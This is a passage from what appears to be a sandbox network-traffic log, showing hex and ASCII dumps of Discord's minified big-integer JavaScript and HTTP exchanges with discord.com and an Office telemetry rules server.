                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 21 3d 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3e 74 2e 6c 65 6e 67 74 68 3f 31 3a 2d 31 3b 66 6f 72 28 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 72 3e 3d 30 3b 72 2d 2d 29 69 66 28 65 5b 72 5d 21 3d 3d 74 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 3e 74 5b 72 5d 3f 31 3a 2d 31 3b 72 65 74 75 72 6e 20 30 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 62 73 28 29 3b 72 65 74 75 72 6e 21 74 2e 69 73 55 6e 69 74 28 29 26 26 28 21 21 28 74 2e 65 71 75 61 6c 73 28 32 29 7c 7c 74 2e 65 71 75 61 6c 73 28 33 29 7c 7c 74 2e 65 71 75 61 6c 73 28 35 29 29 7c 7c 21 28 74 2e 69 73 45 76 65 6e 28 29 7c 7c 74 2e 69 73 44 69 76 69 73 69 62 6c 65 42 79 28 33 29 7c 7c 74 2e 69 73 44 69 76 69 73 69 62 6c
                                                                                                                                                                                                                                                                                    Data Ascii: !==t.length)return e.length>t.length?1:-1;for(var r=e.length-1;r>=0;r--)if(e[r]!==t[r])return e[r]>t[r]?1:-1;return 0}function U(e){var t=e.abs();return!t.isUnit()&&(!!(t.equals(2)||t.equals(3)||t.equals(5))||!(t.isEven()||t.isDivisibleBy(3)||t.isDivisibl
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 53 74 72 69 6e 67 28 29 2b 22 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 2e 22 29 3b 69 66 28 74 68 69 73 2e 69 73 53 6d 61 6c 6c 26 26 63 28 74 3d 4d 61 74 68 2e 70 6f 77 28 6f 2c 45 29 29 29 72 65 74 75 72 6e 20 6e 65 77 20 69 28 52 28 74 29 29 3b 66 6f 72 28 72 3d 74 68 69 73 2c 6e 3d 5f 5b 31 5d 3b 21 30 26 45 26 26 28 6e 3d 6e 2e 74 69 6d 65 73 28 72 29 2c 2d 2d 45 29 2c 30 21 3d 3d 45 3b 29 7b 3b 45 2f 3d 32 2c 72 3d 72 2e 73 71 75 61 72 65 28 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 77 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 77 2c 45 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 2c 6e 3d 74 2e 76 61 6c 75 65
                                                                                                                                                                                                                                                                                    Data Ascii: String()+" is too large.");if(this.isSmall&&c(t=Math.pow(o,E)))return new i(R(t));for(r=this,n=_[1];!0&E&&(n=n.times(r),--E),0!==E;){;E/=2,r=r.square()}return n},i.prototype.pow=o.prototype.pow,E.prototype.pow=function(e){var t=F(e),r=this.value,n=t.value
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 3f 74 2e 73 69 67 6e 3f 31 3a 2d 31 3a 74 2e 69 73 53 6d 61 6c 6c 3f 74 68 69 73 2e 73 69 67 6e 3f 2d 31 3a 31 3a 67 28 72 2c 6e 29 2a 28 74 68 69 73 2e 73 69 67 6e 3f 2d 31 3a 31 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 54 6f 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 3d 3d 3d 31 2f 30 29 72 65 74 75 72 6e 20 2d 31 3b 69 66 28 65 3d 3d 3d 2d 31 2f 30 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 2c 6e 3d 74 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 69 73 53 6d 61 6c 6c 3f 72 3d 3d 6e 3f 30 3a 72 3e 6e 3f 31 3a 2d 31 3a 72 3c 30 21 3d 3d 74 2e 73
                                                                                                                                                                                                                                                                                    Data Ascii: ?t.sign?1:-1:t.isSmall?this.sign?-1:1:g(r,n)*(this.sign?-1:1)},o.prototype.compareTo=o.prototype.compare,i.prototype.compare=function(e){if(e===1/0)return -1;if(e===-1/0)return 1;var t=F(e),r=this.value,n=t.value;return t.isSmall?r==n?0:r>n?1:-1:r<0!==t.s
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 45 71 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 30 3e 3d 74 68 69 73 2e 63 6f 6d 70 61 72 65 28 65 29 7d 2c 45 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 71 3d 45 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 4f 72 45 71 75 61 6c 73 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 71 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 4f 72 45 71 75 61 6c 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 71 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 4f 72 45 71 75 61 6c 73 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 45 76 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 31 26 74 68 69 73 2e 76 61 6c 75 65 5b 30 5d 29 3d 3d 30 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 45 76 65 6e 3d 66 75 6e
                                                                                                                                                                                                                                                                                    Data Ascii: Equals=function(e){return 0>=this.compare(e)},E.prototype.leq=E.prototype.lesserOrEquals=i.prototype.leq=i.prototype.lesserOrEquals=o.prototype.leq=o.prototype.lesserOrEquals,o.prototype.isEven=function(){return(1&this.value[0])==0},i.prototype.isEven=fun


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    7192.168.2.549721162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:17 UTC680OUTGET /assets/sentry.0a75547723fa3698c125.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:18 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 1119213
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d0363dc243b0-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "90185744d23c5063dc7fb2f3e6ef0ecd"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQF%2B2JKAF7gKPkTODySPOrQprUpvMhpsp7B9vzJfCfw2pV9G7QP9Zsy0DdRR3jaiCIUgPned3On1bHQtzwrTirrjccLzec6TnAlfs2y596E%2BHjZXP34BYCOXfuQt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC407INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 36 35 34 38 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 3d 72 2e 6e 6d 64 28 65 29 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 73 28 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 29 2c 72 3d 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 22 2c 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 42 69 67 49 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 65 2c 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 3f 5f 5b 30 5d 3a 76 6f 69 64 20 30 21 3d 3d 74 3f 31 30 21 3d 2b 74 7c 7c 72 3f 78 28 65 2c 74 2c 72 2c 6e 29 3a 46 28 65 29 3a 46 28
                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{var e={654861:function(e,t,r){e=r.nmd(e);var n=function(e){"use strict";var t=s(9007199254740992),r="0123456789abcdefghijklmnopqrstuvwxyz",a="function"==typeof BigInt;function _(e,t,r,n){return void 0===e?_[0]:void 0!==t?10!=+t||r?x(e,t,r,n):F(e):F(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 20 63 28 65 29 7b 72 65 74 75 72 6e 20 2d 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 3c 65 26 26 65 3c 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 3c 31 65 37 3f 5b 65 5d 3a 65 3c 31 65 31 34 3f 5b 65 25 31 65 37 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 65 37 29 5d 3a 5b 65 25 31 65 37 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 65 37 29 25 31 65 37 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 65 31 34 29 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 75 28 65 29 3b 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 72 3c 34 26 26 30 3e 67 28 65 2c 74 29 29 73 77 69 74 63 68 28 72 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 30 3b 63 61 73 65 20 31 3a 72 65 74 75 72
                                                                                                                                                                                                                                                                                    Data Ascii: c(e){return -9007199254740992<e&&e<9007199254740992}function s(e){return e<1e7?[e]:e<1e14?[e%1e7,Math.floor(e/1e7)]:[e%1e7,Math.floor(e/1e7)%1e7,Math.floor(e/1e14)]}function l(e){u(e);var r=e.length;if(r<4&&0>g(e,t))switch(r){case 0:return 0;case 1:retur
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 75 65 2c 6e 3d 74 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 69 73 53 6d 61 6c 6c 3f 6e 65 77 20 6f 28 54 28 72 2c 4d 61 74 68 2e 61 62 73 28 6e 29 29 2c 74 68 69 73 2e 73 69 67 6e 29 3a 6e 65 77 20 6f 28 41 28 72 2c 6e 29 2c 74 68 69 73 2e 73 69 67 6e 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6c 75 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 3b 69 66 28 72 3c 30 21 3d 3d 74 2e 73 69 67 6e 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 75 62 74 72 61 63 74 28 74 2e 6e 65 67 61 74 65 28 29 29 3b 76 61 72 20 6e 3d 74 2e 76 61 6c 75 65 3b 69 66 28 74 2e 69 73 53 6d 61 6c 6c 29 7b 69 66 28 63
                                                                                                                                                                                                                                                                                    Data Ascii: ue,n=t.value;return t.isSmall?new o(T(r,Math.abs(n)),this.sign):new o(A(r,n),this.sign)},o.prototype.plus=o.prototype.add,i.prototype.add=function(e){var t=F(e),r=this.value;if(r<0!==t.sign)return this.subtract(t.negate());var n=t.value;if(t.isSmall){if(c
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 75 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 3b 69 66 28 72 3c 30 21 3d 3d 74 2e 73 69 67 6e 29 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 28 74 2e 6e 65 67 61 74 65 28 29 29 3b 76 61 72 20 6e 3d 74 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 69 73 53 6d 61 6c 6c 3f 6e 65 77 20 69 28 72 2d 6e 29 3a 66 28 6e 2c 4d 61 74 68 2e 61 62 73 28 72 29 2c 72 3e 3d 30 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 69 6e 75 73 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 2c 45 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                    Data Ascii: us=o.prototype.subtract,i.prototype.subtract=function(e){var t=F(e),r=this.value;if(r<0!==t.sign)return this.add(t.negate());var n=t.value;return t.isSmall?new i(r-n):f(n,Math.abs(r),r>=0)},i.prototype.minus=i.prototype.subtract,E.prototype.subtract=funct
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 6c 28 6e 2f 32 29 3b 76 61 72 20 61 3d 74 2e 73 6c 69 63 65 28 6e 29 2c 5f 3d 74 2e 73 6c 69 63 65 28 30 2c 6e 29 2c 6f 3d 72 2e 73 6c 69 63 65 28 6e 29 2c 69 3d 72 2e 73 6c 69 63 65 28 30 2c 6e 29 2c 45 3d 65 28 5f 2c 69 29 2c 63 3d 65 28 61 2c 6f 29 2c 73 3d 65 28 41 28 5f 2c 61 29 2c 41 28 69 2c 6f 29 29 2c 6c 3d 41 28 41 28 45 2c 70 28 64 28 64 28 73 2c 45 29 2c 63 29 2c 6e 29 29 2c 70 28 63 2c 32 2a 6e 29 29 3b 72 65 74 75 72 6e 20 75 28 6c 29 2c 6c 7d 28 69 2c 45 29 2c 63 29 3a 6e 65 77 20 6f 28 4c 28 69 2c 45 29 2c 63 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 74 69 6d 65 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 75 6c 74 69 70 6c 79 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 6d 75 6c 74 69 70 6c 79 42 79 53 6d 61 6c 6c 3d 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                                    Data Ascii: l(n/2);var a=t.slice(n),_=t.slice(0,n),o=r.slice(n),i=r.slice(0,n),E=e(_,i),c=e(a,o),s=e(A(_,a),A(i,o)),l=A(A(E,p(d(d(s,E),c),n)),p(c,2*n));return u(l),l}(i,E),c):new o(L(i,E),c)},o.prototype.times=o.prototype.multiply,i.prototype._multiplyBySmall=functio
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 28 31 3d 3d 3d 41 29 72 65 74 75 72 6e 5b 65 2c 5f 5b 30 5d 5d 3b 69 66 28 2d 31 3d 3d 41 29 72 65 74 75 72 6e 5b 65 2e 6e 65 67 61 74 65 28 29 2c 5f 5b 30 5d 5d 3b 76 61 72 20 54 3d 4d 61 74 68 2e 61 62 73 28 41 29 3b 69 66 28 54 3c 31 65 37 29 7b 72 3d 6c 28 28 6e 3d 44 28 4e 2c 54 29 29 5b 30 5d 29 3b 76 61 72 20 66 3d 6e 5b 31 5d 3b 72 65 74 75 72 6e 28 65 2e 73 69 67 6e 26 26 28 66 3d 2d 66 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 72 29 3f 28 65 2e 73 69 67 6e 21 3d 3d 63 2e 73 69 67 6e 26 26 28 72 3d 2d 72 29 2c 5b 6e 65 77 20 69 28 72 29 2c 6e 65 77 20 69 28 66 29 5d 29 3a 5b 6e 65 77 20 6f 28 72 2c 65 2e 73 69 67 6e 21 3d 3d 63 2e 73 69 67 6e 29 2c 6e 65 77 20 69 28 66 29 5d 7d 41 3d 73 28 54 29 7d 76 61 72 20 4c 3d 67 28 4e 2c 41
                                                                                                                                                                                                                                                                                    Data Ascii: (1===A)return[e,_[0]];if(-1==A)return[e.negate(),_[0]];var T=Math.abs(A);if(T<1e7){r=l((n=D(N,T))[0]);var f=n[1];return(e.sign&&(f=-f),"number"==typeof r)?(e.sign!==c.sign&&(r=-r),[new i(r),new i(f)]):[new o(r,e.sign!==c.sign),new i(f)]}A=s(T)}var L=g(N,A
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 3d 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 2e 6c 65 6e 67 74 68 3e 74 2e 6c 65 6e 67 74 68 3f 31 3a 2d 31 3b 66 6f 72 28 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 72 3e 3d 30 3b 72 2d 2d 29 69 66 28 65 5b 72 5d 21 3d 3d 74 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 3e 74 5b 72 5d 3f 31 3a 2d 31 3b 72 65 74 75 72 6e 20 30 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 62 73 28 29 3b 72 65 74 75 72 6e 21 74 2e 69 73 55 6e 69 74 28 29 26 26 28 21 21 28 74 2e 65 71 75 61 6c 73 28 32 29 7c 7c 74 2e 65 71 75 61 6c 73 28 33 29 7c 7c 74 2e 65 71 75 61 6c 73 28 35 29 29 7c 7c 21 28 74 2e 69 73 45 76 65 6e 28 29 7c 7c 74 2e 69 73 44 69 76 69 73 69 62 6c 65 42 79 28 33 29 7c 7c 74 2e 69 73 44 69 76 69 73 69 62 6c 65 42
                                                                                                                                                                                                                                                                                    Data Ascii: =t.length)return e.length>t.length?1:-1;for(var r=e.length-1;r>=0;r--)if(e[r]!==t[r])return e[r]>t[r]?1:-1;return 0}function U(e){var t=e.abs();return!t.isUnit()&&(!!(t.equals(2)||t.equals(3)||t.equals(5))||!(t.isEven()||t.isDivisibleBy(3)||t.isDivisibleB
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 72 69 6e 67 28 29 2b 22 20 69 73 20 74 6f 6f 20 6c 61 72 67 65 2e 22 29 3b 69 66 28 74 68 69 73 2e 69 73 53 6d 61 6c 6c 26 26 63 28 74 3d 4d 61 74 68 2e 70 6f 77 28 6f 2c 45 29 29 29 72 65 74 75 72 6e 20 6e 65 77 20 69 28 52 28 74 29 29 3b 66 6f 72 28 72 3d 74 68 69 73 2c 6e 3d 5f 5b 31 5d 3b 21 30 26 45 26 26 28 6e 3d 6e 2e 74 69 6d 65 73 28 72 29 2c 2d 2d 45 29 2c 30 21 3d 3d 45 3b 29 7b 3b 45 2f 3d 32 2c 72 3d 72 2e 73 71 75 61 72 65 28 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 77 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 77 2c 45 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 2c 6e 3d 74 2e 76 61 6c 75 65 2c 61
                                                                                                                                                                                                                                                                                    Data Ascii: ring()+" is too large.");if(this.isSmall&&c(t=Math.pow(o,E)))return new i(R(t));for(r=this,n=_[1];!0&E&&(n=n.times(r),--E),0!==E;){;E/=2,r=r.square()}return n},i.prototype.pow=o.prototype.pow,E.prototype.pow=function(e){var t=F(e),r=this.value,n=t.value,a
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 2e 73 69 67 6e 3f 31 3a 2d 31 3a 74 2e 69 73 53 6d 61 6c 6c 3f 74 68 69 73 2e 73 69 67 6e 3f 2d 31 3a 31 3a 67 28 72 2c 6e 29 2a 28 74 68 69 73 2e 73 69 67 6e 3f 2d 31 3a 31 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 54 6f 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6d 70 61 72 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 3d 3d 3d 31 2f 30 29 72 65 74 75 72 6e 20 2d 31 3b 69 66 28 65 3d 3d 3d 2d 31 2f 30 29 72 65 74 75 72 6e 20 31 3b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 2c 6e 3d 74 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 69 73 53 6d 61 6c 6c 3f 72 3d 3d 6e 3f 30 3a 72 3e 6e 3f 31 3a 2d 31 3a 72 3c 30 21 3d 3d 74 2e 73 69 67
                                                                                                                                                                                                                                                                                    Data Ascii: .sign?1:-1:t.isSmall?this.sign?-1:1:g(r,n)*(this.sign?-1:1)},o.prototype.compareTo=o.prototype.compare,i.prototype.compare=function(e){if(e===1/0)return -1;if(e===-1/0)return 1;var t=F(e),r=this.value,n=t.value;return t.isSmall?r==n?0:r>n?1:-1:r<0!==t.sig
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:18 UTC1369INData Raw: 75 61 6c 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 30 3e 3d 74 68 69 73 2e 63 6f 6d 70 61 72 65 28 65 29 7d 2c 45 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 71 3d 45 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 4f 72 45 71 75 61 6c 73 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 71 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 4f 72 45 71 75 61 6c 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 71 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 65 73 73 65 72 4f 72 45 71 75 61 6c 73 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 45 76 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 31 26 74 68 69 73 2e 76 61 6c 75 65 5b 30 5d 29 3d 3d 30 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 69 73 45 76 65 6e 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                    Data Ascii: uals=function(e){return 0>=this.compare(e)},E.prototype.leq=E.prototype.lesserOrEquals=i.prototype.leq=i.prototype.lesserOrEquals=o.prototype.leq=o.prototype.lesserOrEquals,o.prototype.isEven=function(){return(1&this.value[0])==0},i.prototype.isEven=funct


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    8192.168.2.54972513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:20 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:21 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:21 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                    Content-Length: 218853
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                    Cache-Control: public
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 22 Nov 2024 01:49:48 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DD0A97F285E80B"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 91a9dc6d-001e-0028-4620-3dc49f000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201221Z-174c587ffdfb485jhC1TEBmc1s000000036000000000gfp0
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:21 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                    Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
